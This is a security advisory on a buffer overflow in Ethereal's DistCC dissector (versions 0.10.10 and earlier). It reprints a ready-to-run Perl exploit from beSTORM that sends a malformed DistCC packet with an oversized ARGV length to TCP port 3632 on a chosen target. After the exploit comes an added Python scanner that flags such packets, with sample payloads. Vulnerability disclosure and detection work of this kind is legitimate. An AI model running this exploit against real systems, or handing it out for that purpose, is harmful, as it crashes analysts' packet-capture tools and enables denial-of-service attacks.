Ethereal DistCC Buffer Overflow (Exploit)
Summary
As we reported in our previous article, Ethereal DistCC Dissector Overflow, a vulnerability in Ethereal's DistCC dissector allows attackers to crash Ethereal by overflowing an internal buffer that Ethereal uses when handling DistCC-related packets. The following exploit code can be used to test your system for this vulnerability.
Credit:
The information has been provided by beSTORM.
Details
Vulnerable Systems:
* Ethereal version 0.10.10 and prior
Immune Systems:
* Ethereal version 0.10.11 or newer
Exploit:
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved - Copyright (tm)
use IO::Socket;
use strict;
my $target = shift;
my $print_usage = 0;
if (!$target)
{
    usage();
    print "No target has been supplied, reverting to 192.168.1.52.\n";
    $target = "192.168.1.52";
}
print "Will attack $target.\n";
my $target_port = 3632;
my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()\n{\n return(0);\n}\n
END
print "Sending: [$packet]\n";
# Connect to the DistCC port set in $target_port above
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => $target_port);
unless ($remote) { die "cannot connect to distcc daemon on $target" }
print $remote $packet;
print "Done.\n";
sub usage
{
    # Print the usage banner only once
    if ($print_usage) { return; }
    $print_usage = 1;
    print "#" x 50;
    print "\n";
    print "# $0 [hostname]\n";
    print "# hostname\t-\tThe host the packet will be sent to.\n";
    print "\n";
}
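
Detection example (added here, not part of the original advisory or of beSTORM's output): the first ARGV token in the packet above declares a length of FFFFFF00 for a two-byte argument, so a capture filter or pre-parser can walk the token stream and reject length fields that are implausible or run past the captured data. The token layout (4-byte name plus 8 hex digits) is read off the packet shown above; the function name, the max_argv cap and the sample payloads are constructed for illustration.

```python
import string

HEX = set(string.hexdigits.encode())
# Tokens whose parameter is a byte count for the data that follows
# (assumption, read off the packet layout shown in the advisory).
LENGTH_TOKENS = {b"ARGV", b"DOTI"}

def scan_distcc(payload, max_argv=4096):
    """Walk name(4) + hex(8) tokens; return (offset, token, value, reason)
    findings. max_argv is a hypothetical sanity cap, not an Ethereal value."""
    findings, pos = [], 0
    while pos + 12 <= len(payload):
        name, param = payload[pos:pos + 4], payload[pos + 4:pos + 12]
        if not set(param) <= HEX:
            findings.append((pos, name.decode("latin-1"), None,
                             "non-hex parameter"))
            break
        value = int(param, 16)
        start, pos = pos, pos + 12
        if name not in LENGTH_TOKENS:
            continue  # DIST / ARGC carry a plain number, no trailing data
        if name == b"ARGV" and value > max_argv:
            findings.append((start, "ARGV", value, "length over cap"))
            break  # cannot resynchronise after a bogus length
        if value > len(payload) - pos:
            findings.append((start, name.decode("latin-1"), value,
                             "length exceeds captured data"))
            break
        pos += value  # skip the data the token declared
    return findings

# Constructed sample payloads (not captured traffic).
BENIGN = b"DIST00000001ARGC00000002ARGV00000002ccARGV00000002-cDOTI00000003a;\n"
OVERSIZED = b"DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-g"
TRUNCATED = b"DIST00000001ARGC00000001ARGV00000010cc"

if __name__ == "__main__":
    for label, data in (("benign", BENIGN), ("oversized", OVERSIZED),
                        ("truncated", TRUNCATED)):
        print(label, scan_distcc(data))
```
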